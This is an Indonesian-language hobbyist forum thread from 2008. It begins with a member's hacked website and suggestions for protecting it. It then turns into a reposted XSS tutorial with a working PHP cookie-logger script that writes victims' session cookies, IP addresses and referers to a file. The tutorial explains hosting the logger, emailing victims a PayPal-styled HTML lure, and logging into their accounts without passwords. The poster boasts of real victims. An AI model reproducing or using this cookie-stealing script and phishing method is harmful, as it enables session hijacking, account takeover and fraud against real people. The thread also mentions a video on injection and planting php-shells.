2077 Posts in 484 Topics- by 821 Members - Latest Member: liricklagu

Pages: [1]   Go Down
  Print  
Author Topic: Web Gue ke hack (suck)  (Read 2599 times)
tedywinanto
phpBB Guru
*
Offline Offline

Posts: 20


tedy_winanto
View Profile WWW
« on: July 21, 2008, 02:11:48 PM »

Hari ini niatnya gue mau posting ke web gue !
« Last Edit: July 23, 2008, 08:14:51 AM by tedywinanto » Logged

tedywinanto
phpBB Guru
*
Offline Offline

Posts: 20


tedy_winanto
View Profile WWW
« Reply #1 on: July 21, 2008, 03:22:55 PM »

:)
« Last Edit: July 23, 2008, 08:13:00 AM by tedywinanto » Logged

webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« Reply #2 on: July 21, 2008, 09:22:24 PM »

gw ga bisa cek, link yang lu kasi dah suspend smua...
seinget gw dlu lu pernah minta source bwat validasi inputan... mungkin lu kurang detail bacanya.
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged


Ghendut
phpBB Guru
*
Offline Offline

Posts: 77


czar_ghendut18
View Profile
« Reply #3 on: July 22, 2008, 12:23:55 PM »

wah wah, ayo dong para suhu cari cara proteksi untuk web kita,
kalo ga salah gue ada deh tutorial movie tentang injection, google hack & yahoo hack coba deh nanti gue cari2 di hd gue nanti gue coba kirim ke mbah dremi dulu biar di terawang dulu >.<

siapa tau mbah kita ini bisa ngasih cara menanggulangi nya
« Last Edit: January 01, 1970, 07:00:00 AM by Ghendut » Logged


give u'r best, not u'r least .....
tedywinanto
phpBB Guru
*
Offline Offline

Posts: 20


tedy_winanto
View Profile WWW
« Reply #4 on: July 22, 2008, 12:57:30 PM »

:)
« Last Edit: July 23, 2008, 08:13:23 AM by tedywinanto » Logged

webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« Reply #5 on: July 23, 2008, 01:13:45 AM »

yaudah ..... mending make CMS jadi aja kaya WP / Joomla , dah teruji. dari pada proteksinya kurang,...
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged


Ghendut
phpBB Guru
*
Offline Offline

Posts: 77


czar_ghendut18
View Profile
« Reply #6 on: July 24, 2008, 11:39:06 PM »

berhubung blum dapat ijin nya, dari pembuat tutorial movie tentang inject
mohon bersabar yah ...

sekilas tetang penerbit tutor movie inject :
[ h4ntu ] nyoba nginject sekalian nanem php-shell
----------------------------------------------------
Video ini njelasin gmn seh cara nginject, cari target
dan nusuk dengan inject yang kita punya. Masuk ke dlm
trus coba cari tempat buat nanem php-shell di dalemnya
----------------------------------------------------
KumpulBocah # 8/13/2006 # fx.camagenta.web.id

kalo ngga salah ini contact nya (batamhacker@dal.net)
« Last Edit: January 01, 1970, 07:00:00 AM by Ghendut » Logged


give u'r best, not u'r least .....
Ghendut
phpBB Guru
*
Offline Offline

Posts: 77


czar_ghendut18
View Profile
« Reply #7 on: July 24, 2008, 11:41:41 PM »

Seperti yang telah kita ketahui .. XSS merupakan salah sebuah jenis serangan yang paling berbahaya dalam dunia
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..

Tidak percaya?! Mari kita buktikan Cheesy

Selain itu andapun memerlukan file *.php yang berisikan script ini:
<?php
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '<br> idu lu ala: ' .$cookie. 'Cookie: '.$cook.'<br> IP: ' .$ip.  '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..

Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain Cheesy

Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya Cheesy

OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! Cheesy

Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD

woops!!
My bad ..
My victim changed his Pass already Cheesy

Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!

Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha

Sekian~

Credit : Th0R (salam kangen buat ausy broo kangen nih jadi inget IF)

(kalo ga cocok di del aja mbah)
« Last Edit: January 01, 1970, 07:00:00 AM by Ghendut » Logged


give u'r best, not u'r least .....
webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« Reply #8 on: July 25, 2008, 01:08:20 AM »

cocok !!!! :lachtot:  :lachtot:  :lachtot:
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged


huhui
phpBB Guru
*
Offline Offline

Posts: 102


View Profile WWW
« Reply #9 on: September 09, 2008, 07:33:19 AM »

Quote from: "webmaster"
Ghendut


brow mana dong cd tutorialnya gw mau donk :D
Logged

webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« Reply #10 on: September 09, 2008, 01:05:15 PM »

ah si idik mah, nu kitu bki pisan :|  Cheesy  Cheesy
Logged


Pages: [1]   Go Up
  Print  
 
Jump to: